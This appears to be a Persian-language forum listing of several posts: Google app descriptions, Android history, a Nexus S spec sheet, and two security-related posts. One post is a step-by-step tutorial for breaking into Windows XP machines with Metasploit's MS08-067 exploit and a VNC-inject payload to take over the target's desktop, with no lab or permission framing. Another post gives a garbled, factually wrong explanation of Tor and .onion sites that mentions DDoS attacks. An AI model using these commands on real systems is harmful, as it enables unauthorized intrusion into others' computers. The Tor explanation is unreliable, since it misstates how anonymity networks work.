    با استفاده از برنامه Google Sheets، ایجاد، ویرایش و همکاری با دیگران در صفحات گسترده از تلفن یا رایانه لوحی Android خود. با ورق، شما می توانید: - ایجاد صفحات گسترده جدید یا ویرایش فایل های موجود - به اشتراک گذاشتن صفحات گسترده و همگام سازی در همان صفحه گسترده در همان زمان. - کار در هر کجا، در هر زمان - حتی در حالت آفلاین - اضافه کردن و پاسخ به نظرات - قالب بندی سلول ها، وارد یا مرتب سازی داده ها، نمایش نمودار ها، وارد کردن فرمول ها، استفاده از پیدا کردن / جایگزینی و غیره. - نگران نباشید در مورد از دست دادن کار خود - همه چیز به طور خودکار ذخیره می شود که شما تایپ کنید. - بفهمید، فورا، بلافاصله نمودارها را وارد کنید و قالب بندی را در یک شیر اجرا کنید - با کاوش. - باز کردن، ویرایش و ذخیره فایل های اکسل. اطلاعیه مجوز مخاطبین: این برای ارائه پیشنهادات مردم برای اضافه کردن به فایل ها و به اشتراک گذاری با استفاده می شود. ذخیره سازی: برای ذخیره و باز کردن فایل ها بر روی حافظه USB یا SD استفاده می شود. لینک دانلود : Google Sheets - Apps on Google Play
  17. mohammad_ghazei

    Soft-Android

    برنامه رسمی گوگل تقویم را برای گوشی و رایانه لوحی Android خود دریافت کنید تا زمان صرفه جویی کنید و از هر روز بیشترین استفاده را ببرید. • روش های مختلف برای مشاهده تقویم خود - به سرعت بین نمایش ماه، هفته و روز تغییر دهید. • رویدادهای Gmail - پرواز، هتل، کنسرت، رزرو رستوران و موارد دیگر به تقویم شما به صورت خودکار اضافه می شوند. • To-dos - از یادآوری ها برای ایجاد و مشاهده در کنار رویدادهای خود استفاده کنید. • اهداف - اضافه کردن اهداف شخصی مانند "اجرا 3 بار در هفته" - و تقویم زمان خود را برای آنها به طور خودکار برنامه ریزی. • ایجاد رویداد سریع - پیشنهادات هوشمند برای عناوین رویداد، مکان ها و مردم زمان شما را در هنگام ایجاد رویدادها صرفه جویی می کند. • تمام تقویم های خود را در یک مکان - تقویم گوگل با تمام تقویم بر روی گوشی شما کار می کند، از جمله Exchange. لینک دانلود : Google Calendar - Apps on Google Play
  18. mohammad_ghazei

    Soft-Android

    ایجاد، ویرایش و همکاری با دیگران در اسناد از تلفن یا رایانه لوحی Android خود با برنامه Google Docs. با استفاده از Docs شما می توانید: - ایجاد اسناد جدید یا ویرایش فایل های موجود - به اشتراک گذاشتن اسناد و همکاری در همان سند در همان زمان. - کار در هر کجا، در هر زمان - حتی در حالت آفلاین - اضافه کردن و پاسخ به نظرات - نگران نباشید در مورد از دست دادن کار خود - همه چیز به طور خودکار ذخیره می شود که شما تایپ کنید. - تحقیق، درست در Docs Explore - باز کردن، ویرایش و ذخیره اسناد ورد اطلاعیه مجوز مخاطبین: این برای ارائه پیشنهادات مردم برای اضافه کردن به فایل ها و به اشتراک گذاری با استفاده می شود. ذخیره سازی: برای ذخیره و باز کردن فایل ها بر روی حافظه USB یا SD استفاده می شود لینک دانلود : Google Docs - Apps on Google Play
  19. mohammad_ghazei

    Soft-Android

    Google Duo برنامه بالاترین کیفیت برنامه تماس ویدیویی * است. این ساده، قابل اعتماد است و بر روی گوشی های هوشمند و رایانه های لوحی کار می کند. امکانات: رابط کاربری ساده یکی از عزیزان را انتخاب کنید و به سمت راست بروید، با یک رابط ساده که باعث می شود تماس های ویدیویی به آسانی به عنوان یک ضربه بزنید. بالاترین کیفیت برنامه تماس تصویری * تجربه های ویدئویی قابل اطمینان را با کیفیت عالی ویدیو تجربه کنید که آیا شما در Wi-Fi هستید و یا در حال حرکت هستید. برای دستگاه های آندروید و iOS Duo در گوشی های هوشمند و رایانه های لوحی آندروید و iOS کار می کند، بنابراین شما می توانید با دوستان و خانواده نزدیک خود با استفاده از تنها یک برنامه تماس بگیرید. تق تق قبل از اینکه یک پیش نمایش ویدئویی زنده را انتخاب کنید، با کسی تماس بگیرید. پیام های ویدیویی دوست نمی تواند به شما پاسخ دهد؟ بدون مشکل آنها را یک پیام ویدئویی برای آنها بگذارید تا با شما تماس بگیرند. با یک پیام ویدئویی، هنوز می توانید همه چیز را در مورد لحظه ای که می خواهید برای به اشتراک گذاشتن، ضبط کنید. تماسهای صوتی هنگامی که شما نمیتوانید در مورد ویدیو صحبت کنید، تماسهای تلفنی فقط به دوستانتان بدهید. * بر اساس تحقیقات فنی سیگنال تحقیقاتی در مقایسه با زمان تخریب ویدئو بیش از 3G، LTE، و WiFi. ** اتهامات داده ممکن است اعمال شود برای جزئیات بیشتر حامل خود را بررسی کنید. لینک دانلود : Google Duo - High Quality Video Calls - Apps on Google Play
  20. Black_petya

    Miscellaneous

    شاید به ذهنتون برسه که ما چگونه با tor browser میتونیم به سایت های .onion متصل بشیم ولی با فایرفاکس و... نمیتوانیم شما یک کره ی زمین فرض کنین به سه قسمت تقسیم کنید قسمت اول همین گوگل , بینگ , یاهو هست و... که قانونیه فقط به دامنه های .com / .org / .net و.. میره خب قسمت دوم دارک وب همین .onion و قسمت سوم deep web این قسمت هم قسمتی از دارک وب و دامین هایش .onion هیچ فرقی نمیکنه خب. وقتی ما تور را فعال میکنیم مثل این که به 3 تا سیستم در 3 کشور مختلف وصل میشیم تا ip ما هی عوض شود شما میتونید در فایر فاکس 100 تا پروکسی وصل کنید به دارک وب بروید تور باعث تغیر مک ایپی , ایپی میشه تور هر دقیقه به 3 سیستم در کشور های مختلف وصل میشود به اون علت نمیتونن ایپی وبسایت یا ایپی سایلنت را پیدا کنند مثلا الان شما به دامنه های .onion دیداس بزنید میبیند هر دقیقه ip تغیر میکنه خب مکانیزمای تور هم همینه تغیر ایپی و تغیر مک ایپی برنامه های زیادی هست برای مک ایپی هنوز بگذریم این باعث میشه به دارک وب رفت شاید بگید چرا دامنه های .onion نمیشه رفت این دامنه ها توسط دولت ها ف/ی/ل/ت/ر شده و غیر قابل رفتن به انها با مرورگر های خانگی هست برای رفتم باید حدود 5 یا 6 تا فیلترشکن یا پروکسی وصل کرد معمولا در این دامنه ها افراد غیر اخلاقی یا خلاف کار هست به اون علت این دامنه ها در کل جهان مسدود هست ولی اگه ip ها زود زود چنج شود نمیتواند مرورگر بررسی کند و باعث دور زدن مسدودیت میشود. هکر ها معمولا برای شناسایی نشدن ایپی از این روش استفاده میکنند یا tor service را در سیستمشان فعال میکنند . توضیح دقیق در تصویر
  21. با عرض سلام به کاربران عزیز انونیسک در این اموزش قصت دارم برایتان اموزش هک سیستم های دارای ویندوز xp و ریموت دسکتاپ شدن به ان را برای شما یاد دهم . ابتدا ترمینال کالی لینوکس را باز کنید و در داخلش دستور msfconsole را تایپ کنید تا ابزار metasploit باز شود . بعد دستور زیر را تایپ کنید . use exploit/windows/smb/ms08_067_netapi خب با این دستور اکسپلوییت مورد نظر را انتخواب میکنیم . الان سراغ تنظیم rhost یا تارگت میکنیم . خب الان دستور show options را بنویسید . خب الان بنویسید set RHOST 1.1.1.1.1 به جا 1.1.1.1.1 ایپی تارگت را وارد کنید . خب الان باز show options را بنویسید تا ببینید که ایا تارگت تنظیم شده است یا نه . خب الان یک payload را انتخواب میکنیم تا وقتی نفوذ به سیستم شد برای ما با vnc اجرا نماید خب با دستور زیر payload را انتخواب میکنیم . set PAYLOAD windows/vncinject/bind_tcp خب payload انتخواب شد الان باز show options را تایپ کنید تا ببینید RHOST تغیر نکرده اگر کرده باز set RHOST TAGERT IP تنظیم کنید بعد دستور exploit را وارد کنید و صبر کنید تا به سرور یا سیستم تارگت متصل شود . خب اگر متصل شد شما میبینید که دسکتاپ ویندوز xp به شما باز میشود . امید وارم خوشتان امده باشد
  22. Moeein Seven

    Miscellaneous

    گوگل همیشه در حال توسعه‌دادن گوگل مپس می‌باشد و قصد دارد تا این اپ را با زندگی افراد همراه سازد. علاوه بر اینکه این سرویس به شما کمک می‌کند تا از مکانی به مکانی دیگر بروید، همه‌ی نقشه‌ها را به‌شما نمایش می‌دهد و همچنین می‌توانید مکان‌های مورد علاقه خود را نشانه‌گذاری کنید. در این مطلب می‌خواهیم 7 ترفند کاربردی برای گوگل‌ مپس را برای شما معرفی نماییم.
  23. DOCTOR ROBOT

    Soft-Android

    Google Allo Download google allo
  24. DOCTOR ROBOT

    Programming-Android

    آموزش برنامه نویسی اندروید را با آشنایی با این سیستم عامل شروع می‌کنیم. اندروید در یونانی به معنای آدم آهنی است. کار توسعه این سیستم عامل توسط گوگل انجام می‌شود و بر پایه هسته لینوکس است. سیستم عامل اندروید در سال 2005 از یک شرکت کوچک در کالیفرنیا خریداری شد. دست اندرکاران قبلی اندروید بعد از خریده شدن نرم افزار توسط گوگل به گوگل پیوستند و کار توسعه خود را سرعت بیشتری بخشیدند. گوگل در سال 2007 در یک نشست خبری اعلام کرد با همکاری 34 شرکت سعی در تغییر دنیای موبایل دارد. چند عدد از بهترین شرکت‌های موجود در لیست این 34 شرکت عبارتند از: گوگل کوالکام ال‌جی موتورولا انویدیا برودکام و... البته شرکت نوکیا به این انجمن نپیوست و همانطور که می‌دانید چیزی جز نابودی خاتمه فعالیت این شرکت نشد. اولین گوشی معرفی شده با سیستم عامل اندروید در سال 2008 توسط اچ‌تی‌سی با نام HTC Dream عرضه شد. گوگل هر چند وقت یک بروز رسانی جدید از اندروید عرضه می‌کند که تا کنون نسخه‌های زیر به بازار ارائه شده اند: ۲۳ دسامبر ۲۰۰۸: نسخه 1 Alpha ۹ فوریه ۲۰۰۹: نسخه 1/1 Beta ۳۰ آوریل ۲۰۰۹: نسخه 1/5 با نام Cupcake (کیک فنجانی) ۱۵ سپتامبر ۲۰۰۹: نسخه 1/6 با نام Donut (دونات) ۲۶ اکتبر ۲۰۰۹: نسخه 2/0 و 2/1 با نام Eclair (نان خامه‌ای) ۲۰ می۲۰۱۰: نسخه 2/2 با نام Froyo (ماست یخ زده) 6 دسامبر 2010: نسخه 2/3 با نام Gingerbread (نان زنجبیلی) ۲۲ فوریه ۲۰۱۱: نسخه 3/0 و 3/1 و 3/2 با نام Honeycomb (کندوی عسل) نوامبر ۲۰۱۱: نسخه 4/0 با نام Ice Cream Sandwich (ساندویچ بستنی) ۰۹ ژوئیه ۲۰۱۲: نسخه 4/1 و 4/2 و 4/3 با نام Jelly Bean (آب نبات ژله ای) ۳۱ اکتبر ۲۰۱۳: نسخه 4/4 با نام KitKat (کیت کت) ۱۲ نوامبر ۲۰۱۴: نسخه 5/0 با نام Lollipop (آبنبات چوبی) ۰۵ اکتبر ۲۰۱۵: نسخه 6 با نام Marshmallow (پف نبات) ۲۲ اوت ۲۰۱۶: نسخه 7 با نام Nougat (شیرینی تبریزی نقات) نکته: البته روش دیگری برای شماره گذاری نسخه‌های اندروید وجود دارد که می‌توانید در این لینک مشاهده کنید. اگر لیست نام نسخه‌های مختلف اندروید را دوباره نگاه کنید متوجه می‌شوید حرف اول نام هر نسخه به ترتیب حروف الفبای انگلیسی انتخاب شده است. به گفته مدیران اندروید، بزرگترین بروز رسانی اندروید در نسخه 5 بوده است. لوگوی اندروید لوگوی اندروید توسط irina blok طراح مطرح لوگوی تعداد زیادی از شرکت‌های مطرح جهان صورت پذیرفته است. شاید برایتان عجیب باشد ولی این طراح روسی اعلام کرده است که ایده طراحی این لوگوی معروف را از علامت مرد و زن موجود در توالت‌های عمومی گرفته است! نکته جالب دیگر در مورد لوگوی اندروید این است که گوگل مجوز این لوگو را به صورت Open Source منتشر کرده است تا هر کسی که می‌خواهد آن را عوض کند. ویژگی‌ها و نقاط قوت اندروید اندروید تمام تکنولوژی‌های مطرح ارتباطات از جمله bluetooth و Wifi و GSM و WCDMA و LTE و ... را پشتیبانی می‌کند. اندروید از انواع سنسورها و GPS و دوربین‌ها پشتیبانی می‌کند. اندروید فرمت‌های متنوع صوتی، تصویری و فیلم‌ها را پشتیبانی می‌کند. مرورگر این سیستم عامل با WebKit پیاده سازی شده است. پایگاه داده پیش فرض اندروید SQLite است. ابزارهای متنوع توسعه و برنامه نویسی اندروید توسط گوگل در اختیار برنامه نویسان قرار می‌گیرد. زبان برنامه نویسی نرم افزار برای اندروید ابزارهای موجود در اندروید و هر نرم افزاری که قرار است روی اندروید پیاده شود باید با زبان جاوا نوشته شده باشد. در این سیستم عامل کدهای جاوا تبدیل به کدهای Dalvik شده و سپس روی ماشین مجازی Dalvik virtual machine اجرا می‌شوند. Dalvik یک ماشین مجازی بهینه برای پیاده سازی نرم افزارهای قدرتمند با مصرف بهینه از Ram و Cpu است. برای ارتباط با سیستم عامل گوگل API‌هایی را در اختیار برنامه نویسان قرار داده است که تقریبا امکان انجام هر کاری را برای برنامه نویس محیا می‌کند. گوگل در ابتدا محیط برنامه نویسی Eclipse را به همراه پلاگین ADT عرضه کرد. این محیط توسعه هنوز توسط توسعه دهندگان بسیاری طرفداران سر سختی دارد. پس از ارائه Eclipse گوگل محیط توسعه Android Studio را بر اساس پلتفرم IntelliJ IDEA ارائه کرد. در ابتدا این محیط توسعه مشکلات فراوانی داشت به همین دلیل مورد استقبال توسعه دهندگان قرار نگرفت، ولی این محیط توسعه در نسخه 2 خود بسیار رشد کرده است و اکثر برنامه نویسان اندروید به سمت این محیط توسعه کوچ کرده اند.
  25. محمد توکلی

    Mobile-SAMSUNG

    مشخصات عمومی سامسونگ Google Nexus S شبکه 2G GSM 850 / 900 / 1800 / 1900 شبکه 3G HSDPA 900 / 1700 / 2100 تاریخ معرفی 2010, دسامبر وضعیت موجود در بازار. عرضه شده در دسامبر 2010 اندازه سامسونگ Google Nexus S ابعاد 123.9x63x10.9 میلیمتر وزن 129 گرم صفحه نمایش سامسونگ Google Nexus S نوع صفحه نمایش لمسی خازنی Super AMOLED, با 16 میلیون رنگ اندازه 480x800 پیکسل, 4.0 اینچ - Oleophobic surface - Contour Display with curved glass screen - Multi-touch input method - Accelerometer sensor for UI auto-rotate - Touch-sensitive controls - Proximity sensor for auto turn-off - Three-axis gyro sensor زنگ سامسونگ Google Nexus S انواع زنگ ویبریشن; MP3, WAV زنگ اسپیکر - 3.5 mm audio jack حافظه سامسونگ Google Nexus S دفتر تلفن تعداد نامحدود و همراه همه جزئیات, حافظه تصویری حافظه تماس ها نامحدود داخل دستگاه 16GB حافظه داخلی, دارای 512 مگابایت RAM کارت حافظه امکانات ارتباطی سامسونگ Google Nexus S GPRS EDGE 3G HSDPA, 7.2 Mbps; HSUPA, 5.76 Mbps شبکه بی سیم Wi-Fi 802.11 b/g/n; DLNA بلوتوث دارد, v2.1 with A2DP مادون قرمز USB دارد, v2.0 microUSB دوربین سامسونگ Google Nexus S اصلی 5 مگاپیکسل, 2560x1920 پیکسل, فوکوس اتوماتیک, فلش LED دیگر امکانات ثبت اطلاعات مکانی (geo-tagging), فوکوس لمسی (touch focus) فیلم برداری دارد, WVGAبا سرعت 30 فریم در ثانیه ثانویه دارد, VGA دیگر امکانات سامسونگ Google Nexus S OS سیستم عامل اندروید, v2.3 Gingerbread CPU ARM Cortex A8 1GHz processor پیغام رسانی SMS(threaded view), MMS, Email, Push Mail, IM, RSS مرورگر وب HTML رادیو بازی ها رنگ بندی مشكی موقعیت یاب (GPS) دارد, with A-GPS support جاوا Via third party application - Social networking integration - Digital compass - MP4/DivX/WMV/H.264/H.263 player - MP3/WAV/eAAC+/AC3/FLAC player - Organizer - Image/video editor - Document editor (Word, Excel, PowerPoint, PDF) - Google Search, Maps, Gmail, YouTube, Calendar, Google Talk, Picasa integration - Flash Player v10.1 - Voice memo/dial/commands - Predictive text input - Near Field Communications باطری سامسونگ Google Nexus S Standard battery, Li-Ion 1500 mAh زمان آماده باش تا 713 ساعت (2G) / تا 428 ساعت (3G) زمان صحبت تا 14 ساعت (2G) / تا 6 ساعت و 40 دقیقه (3G) سایر موارد سامسونگ Google Nexus S سطح قیمت حدود 650 یورو